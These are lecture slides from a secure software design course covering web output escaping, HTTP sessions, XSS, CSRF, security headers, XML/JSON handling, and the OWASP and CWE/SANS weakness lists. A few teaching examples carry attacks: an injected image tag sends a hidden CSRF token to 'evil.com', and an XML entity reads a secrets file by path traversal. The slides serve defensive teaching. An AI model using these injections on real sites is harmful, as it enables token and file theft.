Output, Web Applications, Top weakness lists


SWE 681 / ISA 681
Secure Software Design &
Programming:
Lecture 6: Output, web applications,
top weakness lists/taxonomies,
& coding standards/guides
Dr. David A. Wheeler
2017-02-25
Outline
• Sending output back
• Web applications
– Including related vulnerabilities
• Common vulnerability lists/taxonomies
• Guides
2
Abstract view of a program
Input
Program
Process Data
(Structured Program
Internals)
Output
You are here
(for the first part
of this lecture)
Call-out to
other programs
(also consider
input & output issues)
3
Minimize security-related feedback
to untrusted users
• “Login failed” – don’t say why
– Log that instead
– Haven’t logged in… especially untrusted!!!
– The point is to prevent attackers from figuring out
valid usernames; if usernames are already public,
don’t worry about hiding whether or not
usernames are valid
• Don’t echo passwords on-screen
– Inhibits shoulder surfing
4
Don’t send comments to users
• Don’t send comments inside material to users
unless you’re sure it’s okay to view
– Sometimes provide system insight, aiding attacker
– System design shouldn’t depend on secrecy, but why
send info only of use to attacker?
• Primarily an issue with web applications
– Comments in HTML/XML/CSS snippets may be used to
generate code
– Okay to comment code; be careful sending it
– Put comments in separate place or strip out
5
Handle full/unresponsive output
• User system may clog/be unresponsive
– E.G., web browser halted, slow TCP/IP response
– Don’t let your system hang due to unresponsive user!
• Release locks quickly, preferably before replying
• Use time-outs on network-oriented writes
– Measure from start of your attempt – ok to halt in the
middle
• Don’t create an easy opportunity for a Denial-ofService attack
6
Control the character encoding of
output
• Don’t let browser/user guess the character
encoding – tell them (and make sure it’s right)
– If browser has to guess, attacker may fool system
into sending material that leads to wrong guess
• Can include in HTML <head>
– <meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
• HTTP “charset” (HTTP/1.1 is practically
universally implemented, so okay to use now)
7
Metacharacters: Same issue
• Escape any characters you send back that
might be interpreted as metacharacters
• Common problems in HTML/XML: < > & " '
• Challenge: Must ensure browser interprets
them the same way
– Encoding!
– Again, whitelist
8
java.net.URLEncoder.encode
(String s, String enc)
• Translates a string into application/x-www-form-urlencoded format using a
specific encoding scheme (e.g., UTF-8)
• Rules (per Java spec):
– Remain same: A-Z, a-z, 0-9, ".", "-", "*", and "_"
– Space converted to “+”
– All other characters are unsafe:
• Converted into encoding scheme (UTF-8 recommended)
• Each byte is represented by "%xy", where xy is 2-digit hex
representation
• E.G., encode("The string ü@foo-bar" , "UTF-8") produces
"The+string+%C3%BC%40foo-bar“
– In UTF-8, ü is encoded as two bytes C3 (hex) and BC (hex), while
@ is encoded as one byte 40 (hex)
9
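A minimal, runnable Java sketch of the call described above (the class name is illustrative); the output shown in the comment matches the slide's example:

import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

public class UrlEncodeDemo {
    public static void main(String[] args) throws UnsupportedEncodingException {
        // Encode untrusted text before embedding it in a URL query string
        String encoded = URLEncoder.encode("The string ü@foo-bar", "UTF-8");
        System.out.println(encoded);   // prints: The+string+%C3%BC%40foo-bar
    }
}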
Escaping text in
Web application frameworks
• Some web application frameworks encode
strings for HTML by default when outputting
– Safer defaults are generally a good thing (less
likely to make a mistake)
• Know when escaping does & doesn’t happen
– Otherwise you may escape more than once
– Otherwise you might accidentally disable or
circumvent escaping
– Goal: Escape what you need to escape ONCE
10
Ruby on Rails
• “SafeBuffer” is String subclass for HTML text that’s safe to output
– Normal String considered unsafe; user data in String by default
– String.html_safe() returns SafeBuffer version of data without escaping
it (beware – do not use on untrusted user data!)
– If SafeBuffer concatenates (unsafe) String (e.g., “<<“ or “+”), String is
HTML escaped & then concatenated to produce combined SafeBuffer
– If SafeBuffer concatenates SafeBuffer, no additional escaping
– Tag helpers concatenate application-provided tags (in SafeBuffers)
with user-provided data (auto-escaped if unsafe, per previous rule)
• HTML typically generated by ERB template
– Rails renders text into a SafeBuffer; constant template data (part of
application) considered safe & thus is in a SafeBuffer
– <%= ruby code to output %> is concatenated, thus results have HTML
escaping applied to it if its results are unsafe (e.g., normal string)
– <%= raw … %> and <%== … %> are html_safe, not escaped (optimized)
This applies to Ruby on Rails version 3 or later.
Source: Koch, Henning. Everything you know about html_safe is wrong.
http://makandracards.com/makandra/2579-everything-you-know-about-html_safe-is-wrong
11
Ruby on Rails Example
Example ERB Template
<p>
<%= '<br />' %>
<%= '<br />'.html_safe %>
</p>
Internally Ruby on Rails does…
html = ''.html_safe
html << '<p>'.html_safe
html << '<br />'
html << '<br />'.html_safe
html << '</p>'.html_safe
Producing
this HTML
<p>
&lt;br /&gt;
<br />
</p>
Source: Koch, Henning. Everything you know about html_safe is wrong.
http://makandracards.com/makandra/2579-everything-you-know-about-html_safe-is-wrong
12
Focus on Web applications:
HTTP, HTTPS, HTML
• HTTP: Protocol for requesting/sending
information
• HTTPS: HTTP over SSL/TLS (encrypted)
• HTML: Common data format
13
HTTP
• HTTP - HyperText Transfer Protocol
– Simple request/response protocol
– Web client sends requests, web server responds
– Runs on top of TCP/IP protocols
• Basic protocol:
– Client (e.g., user’s web browser) sends HTTP request
to HTTP server port (typically port 80)
– HTTP server receives request & performs some action
per request & privileges
– HTTP server sends back request file (if ok) and
status/error message
14
Standard HTTP/1.1 request
methods (per spec)
• OPTIONS: Get info on comm options
• GET: Retrieve information
• HEAD: Like GET, but just get meta-information
• POST: Post (form) data
• PUT: Store (replacement) data
• DELETE: Delete the resource
• TRACE: Show client what recipient receives
• CONNECT: Reserved for future use
Typically have message headers, field-name: [value]
15
HTTP Safe Methods
(per HTTP/1.1 specification)
• GET and HEAD methods SHOULD NOT have the
significance of taking any action other than retrieval
– Don’t buy/sell anything, change status, etc.
• User agents can represent other methods (e.g., POST,
PUT and DELETE) differently, denote “possibly unsafe”
– E.g., GET = Click on link, POST = “Submit” button
– Important hint to user – helps prevent fooling user
• Protocol can’t enforce, but if GET or HEAD used, “user
did not request the side-effects, so therefore cannot be
held accountable for them”
16
HTTP Idempotent Methods
(per HTTP/1.1 specification)
• “Idempotence” = aside from error or expiration issues,
side-effects of > 1 identical requests same as 1 request
• Methods GET, HEAD, PUT and DELETE idempotent
– Not POST!
• Methods OPTIONS and TRACE also idempotent
– Because they SHOULD NOT have side effects at all
• Beware: a sequence of several requests can be non-idempotent, even if all of its methods are idempotent
– E.G., a sequence is non-idempotent if its result depends on
a value that is later modified in the same sequence
17
Trivial GET request
(from client to server)
GET /index.html HTTP/1.1
host: www.dwheeler.com
accept-Language: en
Connection: keep-alive
referer: https://www.dwheeler.com/misc.html
Blank line to end the request
HTTP is a simple text-based protocol; every line ends
with CRLF (officially) and a blank line ends the request.
You can send this manually using:
telnet www.dwheeler.com 80
18
HTTP Responses
• First line is “Status line”
– Protocol version, 3-digit numeric status code, &
associated textual phrase
– 2xx: Success - The action was successfully
received, understood, and accepted. 200=OK
– 4xx: Client Error - The request contains bad syntax
or cannot be fulfilled. 404=not found,
401=unauthorized
• Followed by rest of response
19
Trivial GET reply
HTTP/1.1 200 OK
Date: Mon, 01 Oct 2012 21:41:47 GMT
Server:
Last-Modified: Sun, 02 Sep 2012 18:49:14 GMT
ETag: "67622cb-9d4f-7b3f5e80"
Accept-Ranges: bytes
Content-Length: 40271
Content-Type: text/html
Blank line precedes reply data
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
…
20
HTTP Response Splitting
• HTTP replies (like the previous one) can
include many fields
• Be very careful about data sent back in fields
– Especially newline & return! Attacker can create
new fields/responses if can insert these
– Any control characters & “:” concerning
– Whitelist, not blacklist – limit to alphanum if can
– Best to limit input also (if you can)
21
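A minimal Java sketch of the whitelist idea above (the class name and exact pattern are illustrative assumptions, not from the slides): reject any value containing characters outside a tight whitelist before it is placed in a response header.

import java.util.regex.Pattern;

public final class HeaderValues {
    // Whitelist: letters, digits, and a few safe punctuation characters only;
    // CR, LF, ':' and other control characters are implicitly rejected.
    private static final Pattern SAFE = Pattern.compile("[A-Za-z0-9._-]{1,128}");

    public static String requireSafe(String value) {
        if (value == null || !SAFE.matcher(value).matches()) {
            throw new IllegalArgumentException("Unsafe header value");
        }
        return value;
    }
}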
Trivial POST Request
POST /myform.html HTTP/1.1
host: www.example.com
cookie: myId=dwheeler
referer: http://www.example.com/index.html
content-Type: application/x-www-form-urlencoded
content-Length: 325
connection: keep-alive
Blank line to end the header, encoded data follows
22
GET: Parameters sent as part of
query string
• “GET” can send information, via query string
parameters
– Often sent to other sites by HTTP referer header
– Often stored in browser history
– Often written to log files
• POST sends parameters separately (body)
• Use POST when:
– Doing some action that shouldn't be auto-repeated
– Information is sensitive
– When authentication required
– In these cases forbid GET, don't allow as alternative
23
HTTP Cookies: Basics
• Server may reply with fields to set cookies:
Set-Cookie: name=value
Set-Cookie: name2=value2; Expires=Wed, 09-Jun-2021 10:18:14 GMT
• From then on, browser includes cookie values
as part of requests to that domain:
Cookie: name=value; name2=value2
• If no expiration time set, cookie expires when
browser exits
• If expiration time set, browser is supposed to
store cookie persistently (user may erase)
24
Cookie attributes
• Beyond name/value pair, cookie attributes:
– cookie domain: Server domain when cookie will be
sent (default: this domain, limits on alternates)
– path: Path when cookie will be sent (default: this
path)
– expiration time or maximum age (seconds)
– secure flag: Only transmit on encrypted channel
– HttpOnly flag: Only HTTP/HTTPS (not javascript)
• Browsers will not send cookie attributes back to
the server (just name/value pair)
25
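As an illustration (a sketch using the standard Java Servlet API; the cookie name and helper are made up), setting the attributes above on a session cookie might look like:

import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletResponse;

public class CookieExample {
    static void addSessionCookie(HttpServletResponse response, String sessionId) {
        Cookie cookie = new Cookie("SESSIONID", sessionId); // illustrative name
        cookie.setSecure(true);     // only send over encrypted (HTTPS) channels
        cookie.setHttpOnly(true);   // not readable from JavaScript
        cookie.setPath("/");        // path for which the cookie is sent
        // No setMaxAge() call: cookie expires when the browser exits
        response.addCookie(cookie);
    }
}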
Session Management
• HTTP is stateless
– By itself, a server doesn’t know of any relationship between
“this” request (or user) & previous requests
– Perfect for “please send me this static file”
– Inadequate for interactive applications, shopping carts, etc.
• For many applications, need to identify & manage sessions
– Typically by passing a “session identifier”
– User logs in, gets session id, all logged-in requests have that id
– Typically exchanged in a cookie (secure, HttpOnly)
• Good session identifiers are not guessable
• Session management, properly implemented, can prevent
session hijacking and cross-site request forgery (CSRF)
attacks
26
Session Management: Reuse Code
• Best to use existing application container/ library
for HTTP session management
– Set up session ids, etc.
• But check that it’s secure (may need to
configure):
– Session identifier should have at least 128 bits of
random data (else too easily guessed)
– Must use cryptographically secure pseudo-random
number generator (PRNG) to generate identifier – not
“add one” or roll-your-own
– Encrypt session ids over untrusted channels
• If you don’t, many can see session id, enables session forging
27
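If you do have to generate identifiers yourself, here is a minimal Java sketch of the two requirements above (cryptographically secure PRNG, at least 128 bits); normally the application container does this for you.

import java.math.BigInteger;
import java.security.SecureRandom;

public final class SessionIds {
    private static final SecureRandom RNG = new SecureRandom(); // CSPRNG, not "add one"

    public static String newSessionId() {
        byte[] bytes = new byte[16];      // 16 bytes = 128 bits of randomness
        RNG.nextBytes(bytes);
        return new BigInteger(1, bytes).toString(16); // hex-encode
    }
}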
Always create new session when
user authenticates
• Even if user has an existing session, always create
a new session when user authenticates
– Ignore old session
• Failing to do so permits “session fixation” attack
– Attacker creates a new session, tricks user into using
that session to authenticate against
– Server sees user has a session ID & reuses it
– Attacker may now be able to use session ID (that they
created) to gain control with victim’s privileges
28
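In the Java Servlet API, the rule above might be implemented roughly like this (a sketch; error handling omitted):

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

public class LoginSessions {
    static HttpSession freshSessionAfterLogin(HttpServletRequest request) {
        HttpSession old = request.getSession(false); // existing session, if any
        if (old != null) {
            old.invalidate();            // discard the (possibly attacker-chosen) session
        }
        return request.getSession(true); // new session with a new identifier
    }
}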
Session fixation attack
[Figure: session fixation attack among Mallory (malicious user), the web server,
and Alice's web browser]
1. Mallory logs in & gets session_id = 111
2. Mallory sends Alice a link: "Click here to see dancing pigs"
   http://...?session_id=111
3. Alice clicks; her browser goes to the site & auto-provides session_id=111,
   username, and password
4. Server sees session_id & just reuses it, & reassociates that session_id to Alice
5. Mallory re-accesses with session_id, which now has Alice's permissions
• In session fixation attack, attacker exploits
server that fails to reassign session ids on login
29
Sessions: Limit Time
(Idle time & session time)
• Set maximum session idle time and maximum session
time to reduce risk & damage
– If user doesn’t log out, only short exposure time
– Fewer valid session ids for attacker to guess
– Even if attacker gets session id, limits time it’s valid
• E.g., an application container that implements Java
Servlet: configure web.xml to set session idle timeout:
<session-config> <!-- timeout, in minutes -->
<session-timeout>60</session-timeout>
</session-config>
30
Session time: Limit maximum time
• May have to implement session timeouts yourself
• Java servlets: Chess book describes how to use
doFilter() to do this
– Store current time for session first time request is
made for that session
– If session still in use after maximum lifetime,
invalidate session
• Be sure to provide a “logout” function for users
– So users can make the time even shorter!
31
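This is not the Chess book's code, but one possible shape of such a filter in the Java Servlet API (the attribute name and maximum lifetime are assumptions):

import java.io.IOException;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

public class AbsoluteTimeoutFilter implements Filter {
    private static final long MAX_LIFETIME_MS = 8 * 60 * 60 * 1000L; // assumed: 8 hours

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpSession session = ((HttpServletRequest) req).getSession(false);
        if (session != null) {
            Long start = (Long) session.getAttribute("session.start");
            if (start == null) {
                // First request for this session: record its creation time
                session.setAttribute("session.start", System.currentTimeMillis());
            } else if (System.currentTimeMillis() - start > MAX_LIFETIME_MS) {
                session.invalidate();   // force re-authentication
            }
        }
        chain.doFilter(req, res);
    }

    public void init(FilterConfig config) { }
    public void destroy() { }
}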
Sessions: Ensure that
logging off disables cookie
• Users expect that after “log off” they must “log in” to
reconnect
– To ensure this, log off must disable server-side session
cookies to prevent their reuse
– Otherwise, the cookie could continue the session
– Session cookies can be captured, e.g., by malware, XSS (to
be discussed), or by stealing your phone
• Many systems don’t disable cookies on log off
– Failures include: Office 365, Yahoo mail, Wordpress
– Correctly disable: Gmail, Tweetdeck, Facebook
– As of 2013-07-13
More info: http://samsclass.info/123/proj10/cookie-reuse.htm
32
Cross-Site Scripting (XSS) /
Cross-Site Malicious Content
• Clients (e.g., web browsers) typically presume
that server intended to send data it sent
– Some secure programs (e.g., web apps) accept data &
pass that data on to a user’s application (the victim)
– If the secure program doesn't protect the victim, the
victim's application (e.g., their web browser) may then
process that data in a way harmful to the victim
– Server isn’t subverted directly… but used as a passthrough to victim
• Not called “CSS” (= Cascading Style Sheets)
33
XSS – Persistent Store Example
[Figure: persistent-store XSS among Mallory (malicious user), the web server,
its database, and Alice's web browser]
1. Mallory sends malicious data (e.g., HTML comment with malicious script in it)
   to the web server
2. Data stored in the database & later retrieved
3. Alice requests info (e.g., view comments), & receives malicious code
   (that may be auto-run)
• In persistent-store XSS, attacker sends data to server
that is stored by server for later use
• When victim requests, server includes malicious data
34
XSS –Reflection Example
[Figure: reflected XSS among Mallory (malicious user), the web server,
and Alice's web browser]
1. Mallory sends malicious data to Alice (e.g., in a hypertext link/form)
2. Alice sends it on to the server
3. Alice receives the malicious data "reflected back" to her… and trusts it
• In reflected XSS, attacker sends data to victim so victim will send it on to
server
– Often a special hypertext link or web form pointed to trusted server
• Server then reflects data back; victim browser sees data “from” the server
& trusts it
35
XSS- DOM-based
• Client is tricked into sending the attack to itself
• See: https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
36
Countering XSS
• Output escaping
– Untrusted user data should be escaped before sending to user
– Avoid copying data back to user (if URL bad, don’t send it back –
legitimate user can see it already)
• Input filtering for metacharacters
– Metacharacters include <, &, >, ", '
– Forbid/remove/quote on input
– Can't always do this
– Use libraries for HTML input (e.g., to allow <i>…</i> without
allowing embedded Javascript)
• Set HttpOnly on cookies sent
– Web browser scripts can’t access these cookie values
– Imperfect defense, but can make some attacks harder
37
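To make the output-escaping bullet above concrete, here is a minimal Java sketch that escapes the HTML metacharacters listed earlier (for HTML element content); in practice, prefer the escaping built into your framework or a maintained encoder library.

public final class HtmlEscape {
    // Replace characters that HTML could interpret as markup
    public static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}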
Newer XSS countermeasure:
Content Security Policy (CSP)
• Content Security Policy (CSP) is W3C Candidate Recommendation
• Defines “Content-Security-Policy” HTTP header
– If used, creates whitelist of sources of trusted content for this webpage
– Compliant browsers only execute/render items (Javascript) from those sources
• Chrome 16+, Safari 6+, and Firefox 4+. IE 10 has very limited support
– Twitter and Facebook have deployed this
• Typically must modify website design to fully use it
– E.g., move Javascript into separate files, otherwise receiving browser can’t
distinguish whitelisted & malicious Javascript
• Only works when users use compliant browsers
• Expect CSP to grow additional capabilities
• More info:
– http://www.html5rocks.com/en/tutorials/security/content-security-policy/
– http://www.w3.org/TR/CSP/
– https://blog.twitter.com/2011/improving-browser-security-csp
38
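For example, a policy that only allows scripts and other resources from the site itself (the host name is illustrative) could be sent as a response header like:

Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.example.com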
Content Security Policy (CSP) helps,
but is no panacea
• CSP is a useful defensive measure, but can sometimes be worked
around
• E.G., evil URL (annotations at right describe each line):
<img src='http://evil.com/log.cgi?                      <- injected line, non-terminated param
...
<input type="hidden" name="xsrf_token" value="12345">   <- secret
...
'                                                       <- normally-occurring apostrophe
• When user views, evil.com receives a lot of the following text
(including text that was supposed to be hidden)
• Use output escaping & input filtering; then use defensive measures
(like CSP) to counter mistakes
Source: “Postcards from the post-XSS world” by Michal Zalewski, http://lcamtuf.coredump.cx/postxss/
39
Cross-Site Request Forgery
(CSRF/XSRF)
• Cross-site request forgery (CSRF/XSRF) essentially
opposite of XSS
– XSS exploits user’s trust in a server
– CSRF/XSRF exploits server’s trust in a client
• In CSRF/XSRF:
– Attacker tricks user into sending data to server
– Server believes that user consciously & intentionally
chose that action
• XSS fools clients; XSRF fools servers
40
Cross-Site Request Forgery
(CSRF/XSRF) Example
Web Server
Mallory
(Malicious user)
1. Mallory sends
malicious data to
Alice (e.g., in a
hypertext link/form)
2. Alice sends on to server;
server acts on command
“sent” by Alice
Alice’s
Web browser
• In CSRF/XSRF, like reflected XSS, attacker sends data to
victim so victim will send it on to server
– Attacker’s approach is in many ways like reflected XSS
• Attacker’s purpose is for server to act on the command
– Target is server not client – difference from XSS
41
Countering CSRF/XSRF
• Require authentication data in same HTTP Request in critical operation
• “SameSite” cookie attribute (Lax or Strict), if browser supports
– Solves long-term. https://www.sjoerdlangkemper.nl/2016/04/14/preventing-csrf-with-samesite-cookie-attribute/
• Require secret user-specific CSRF token in all forms/side-effect URLs
(attacker doesn’t know, so can’t put in token) – usual solution today
• Check HTTP Referer or Origin header
– If you do that, “no Referer” must be treated as unauthorized (attacker can
suppress Referer)
– Some client vulnerabilities may subvert this
• Use CSRF countermeasures in login - prevent login forgery
• Helpful partial countermeasures (make harder to attack):
– Logoff after X minutes inactivity
– Don’t allow GET (link) to have side-effects - only POST (button)
• XSS vulnerabilities allow bypass of CSRF countermeasures
42
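A rough Java sketch of the "secret user-specific CSRF token" countermeasure above (the attribute and parameter names such as csrf_token are illustrative; real web frameworks usually provide this for you):

import java.math.BigInteger;
import java.security.MessageDigest;
import java.security.SecureRandom;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

public final class CsrfTokens {
    private static final SecureRandom RNG = new SecureRandom();

    // Create (once per session) the token to embed as a hidden form field
    public static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute("csrfToken");
        if (token == null) {
            token = new BigInteger(130, RNG).toString(32);
            session.setAttribute("csrfToken", token);
        }
        return token;
    }

    // Check the token echoed back with a state-changing (POST) request
    public static boolean isValid(HttpServletRequest request) {
        HttpSession session = request.getSession(false);
        if (session == null) return false;
        String expected = (String) session.getAttribute("csrfToken");
        String actual = request.getParameter("csrf_token");
        if (expected == null || actual == null) return false;
        // Constant-time comparison to avoid timing side channels
        return MessageDigest.isEqual(expected.getBytes(), actual.getBytes());
    }
}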
Web applications – hardening
headers to make attacks harder
• Content Security Policy (CSP) – already noted
• HTTP Strict Transport Security (HSTS)
– “Only use HTTPS from now on for this site”
• X-Content-Type-Options (as "nosniff")
– Don’t guess MIME type (& confusion it can bring)
• X-Frame-Options
– Clickjacking protection, limits how frames may be used
• X-XSS-Protection
– Force enabling filter to detect likely (reflected) XSS by
monitoring requests / responses
– On by default in most browsers
See: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
43
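As an illustration, these hardening headers are sent as ordinary response header lines; the values below are common examples, not the only valid ones:

Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block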
Redirection
• Web applications frequently redirect and forward users to other
pages and websites
• Don’t use unvalidated untrusted data to determine destination
pages
• Solutions (per OWASP):
1. Simply avoid using redirects and forwards.
2. If used, don't involve user parameters in calculating the destination.
This can usually be done.
3. If destination parameters can't be avoided, ensure that the supplied
value is valid, and authorized for the user. It is recommended that
any such destination parameters be a mapping value, rather than the
actual URL or portion of the URL, and that server side code translate
this mapping to the target URL
4. Applications can use OWASP ESAPI to override the sendRedirect()
method to make sure all redirect destinations are safe
44
Disable caching correctly for
sensitive data
• Web browsers normally cache web pages to storage
– Greatly reduces future latency
– Do not cache sensitive data – enables many attacks
• Disable sensitive data caching using HTTP 1.1 (1999)
– Cache-Control: no-store
• Common mistake = Using non-standard approach
– Non-standard cache disabling mechanisms only disable
caches on some browsers, & few test it
– “Industry-wide Misunderstandings of HTTPS” (June 2013)
found that 70% of tested financial, healthcare, insurance
and utility account sites did it wrong (“Only IE6 exists”)
• In general, try to use standard mechanisms for security
45
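In a Java servlet, disabling caching for a response carrying sensitive data is a one-line header (a sketch; the helper name is illustrative):

import javax.servlet.http.HttpServletResponse;

public class NoStore {
    static void disableCaching(HttpServletResponse response) {
        // Standard HTTP/1.1 mechanism; works across compliant browsers and proxies
        response.setHeader("Cache-Control", "no-store");
    }
}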
AJAX & JSON
• AJAX = “Asynchronous JavaScript and XML”
– Common set of technologies/techniques
• Often uses JSON = JavaScript Object Notation
– For data serialization, original spec RFC 4627
• JSON example:
{
  "firstName": "David",
  "lastName": "Wheeler",
  "address": {
    "streetAddress": "1600 Pennsylvania Ave",
    "city": "Washington",
    "state": "DC"
  }
}
(Note: JSON doesn't allow trailing commas; JSON5 does)
46
JSON: Don’t just “eval”
untrusted data!
• Most JSON-formatted text also syntactically legal
JavaScript code
• “Easy” way to parse JSON-formatted data in JavaScript
is eval()
– Doesn’t support some Unicode characters
• Security vulnerability if data & Javascript environment
not controlled by single trusted source
– E.g., malicious Javascript attack, application forgery, etc.
• In general, don’t “eval” untrusted data!!!
– Best approach: use newer function JSON.parse()
• Mozilla Firefox 3.5+, MS IE 8+, Opera 10.5+, Google Chrome, Safari
– Next-best (old browsers): Check input first - picky whitelist
47
XML: Check formatting
• Lots of data/messages formatted using XML
• “Well-formed”: Follows certain syntax rules
– E.G., all opened tags are closed, nesting ok
– Check before using from untrusted sources!
• “Valid”: Meets some schema definition
– Check for validity before using untrusted input
• Eliminates many problems – schema == whitelist
– Don’t let attacker determine what schema to use!
• Decide what schema is okay & use that
48
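A minimal Java sketch of validating untrusted XML against a schema that you chose (the file names are illustrative assumptions):

import java.io.File;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;

public class ValidateXml {
    public static void main(String[] args) throws Exception {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        Schema schema = factory.newSchema(new File("building.xsd")); // schema WE chose
        Validator validator = schema.newValidator();
        // Throws an exception if untrusted.xml is not well-formed or not valid
        validator.validate(new StreamSource(new File("untrusted.xml")));
    }
}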
XML: External References
• Don’t accept unchecked external references from untrusted sources
– These are URLs (absolute or relative)
– Forbid or check (with whitelist) external reference before use
• Examples:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!DOCTYPE letter [
<!ENTITY part1 SYSTEM "http://www.example.com/part1.xml">
<!ENTITY part2 SYSTEM "../../../secrets/part2.xml">
]> …
<building>
&part1; &part2;
</building>
49
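When parsing XML from untrusted sources in Java, DTD and external entity processing can be switched off before parsing; a sketch (the feature URI is the one documented for Xerces-based parsers such as the JDK default):

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

public class SafeXmlParser {
    static DocumentBuilder newHardenedBuilder() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Refuse DOCTYPE declarations entirely (blocks most XXE attacks)
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }
}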
Web applications are client/server
• Web browser is a client, web server is a server
• Need to not trust each other
• In particular, server needs to not blindly trust
what client says
– Javascript on client is great…
– Server must NOT trust validation by untrusted
client
– Yes, we’ve said this before 
50
Top weakness lists, taxonomies,
and style guides
51
Overview of some common top
weakness lists & taxonomies
• Different organizations have developed “top” weaknesses (types of flaws
that can lead to a vulnerability)
– Goal: Identify some specific “things to look for first”
– Vulnerability lists may merge problems that can’t happen (or are less
important) in a particular environment – or be specific to a different
environment (web vs. embedded)
– Best “top” list is the one for your project & organization
– You do not need to memorize items in list or CWE numbers!
– You do need to know, for a given name, what it is (if we’ve covered it)
• Taxonomies try to give broader overviews/organization of weaknesses
– Some organized by attack (how to attack it)
– Some organized by flaws (defect which may result in security violation)
• We’ll review a few “top” weakness lists & taxonomies
– Help reinforce what we’ve already learned
– Want you to know of some common ones (name recognition)
– Haven’t covered some yet (crypto) – we will!
52
Common Vulnerabilities and
Exposures (CVE)
• CVE = “dictionary of publicly known information security
vulnerabilities and exposures”
• Vulnerability = a specific mistake in some specific software
directly usable by an attacker to gain access to
system/network (not just any mistake)
• Exposure = a specific system configuration issue or mistake
in software that allows access to information or capabilities
that can be used as a stepping-stone
• CVE-2013-1380 = Specific Adobe Flash Player vulnerability
• Common naming system – know if discussing same thing
– Many organizations report vulnerabilities
– CVE IDs let you cross-reference their reports
• More info: http://cve.mitre.org & http://nvd.nist.gov/
53
Common Vulnerability Scoring
System (CVSS) version 2.0
• Standard scoring system for a vulnerability (0..10, 10=riskiest)
• Goal: Simplify prioritizing them for remediation
• Base metric group - intrinsic characteristics
– Access Vector (AV): Local, adjacent network, network
– Access Complexity (AC): High, medium, low
– Authentication (Au): Multiple, single, none
– Confidentiality Impact (C): None, partial, complete
– Integrity Impact (I): None, partial, complete
– Availability Impact (A): None, partial, complete
• Temporal (optional) - characteristics that change over time
– Exploitability (E); Remediation Level (RL); Report Confidence (RC)
• Environmental (optional) - characteristics relevant to particular
environment
– Collateral Damage Potential (CDP); Target Distribution (TD); Security
Requirements (CR, IR, AR)
“A Complete Guide to the Common Vulnerability Scoring System Version 2.0” http://www.first.org/cvss/cvss-guide.html
“CVSS version 2 calculator” http://nvd.nist.gov/cvss.cfm?calculator&version=2
54
Common Weakness Enumeration
(CWE)
• Common Weakness Enumeration (CWE) = list of
software weaknesses
• Weakness = Type of vulnerabilities
• CWE-120 = Buffer Copy without Checking Size of
Input (“Classic Buffer Overflow”)
• Again, common naming system
– Useful as “common name”
– Does have some structuring/organization (slices,
graphs, parents/children)… but that’s not its strength
• More info: http://cwe.mitre.org
55
OWASP Top 10 (2013)
Security Risk – Covered in class session on:
A1: Injection – Call out (SQL injection, shell injection)
A2: Broken Authentication and Session Management – Authentication
A3: Cross-Site Scripting (XSS) – Design, Web application
A4: Insecure Direct Object References – Design (least privilege), Web application
A5: Security Misconfiguration – Design
A6: Sensitive Data Exposure – Design (least privilege), Cryptography
A7: Missing Function Level Access Control – Design (least privilege)
A8: Cross-Site Request Forgery (CSRF) – Design, Web application
A9: Using Components with Known Vulnerabilities – Obsolete code (8), Call out, Design
A10: Unvalidated Redirects and Forwards – Design, Web application
56
CWE/SANS Top 25 Most
Dangerous Software Errors (2011)
Rank  CWE ID   Name
[1]   CWE-89   Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[2]   CWE-78   Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[3]   CWE-120  Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4]   CWE-79   Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[5]   CWE-306  Missing Authentication for Critical Function
[6]   CWE-862  Missing Authorization
[7]   CWE-798  Use of Hard-coded Credentials
[8]   CWE-311  Missing Encryption of Sensitive Data
[9]   CWE-434  Unrestricted Upload of File with Dangerous Type
[10]  CWE-807  Reliance on Untrusted Inputs in a Security Decision
57
2011 CWE/SANS Top 25 Most
Dangerous Software Errors
Rank  CWE ID   Name
[11] CWE-250 Execution with Unnecessary Privileges
[12] CWE-352 Cross-Site Request Forgery (CSRF)
[13] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[14] CWE-494 Download of Code Without Integrity Check
[15] CWE-863 Incorrect Authorization
[16] CWE-829 Inclusion of Functionality from Untrusted Control Sphere
[17] CWE-732 Incorrect Permission Assignment for Critical Resource
[18] CWE-676 Use of Potentially Dangerous Function
[19] CWE-327 Use of a Broken or Risky Cryptographic Algorithm
[20] CWE-131 Incorrect Calculation of Buffer Size
58
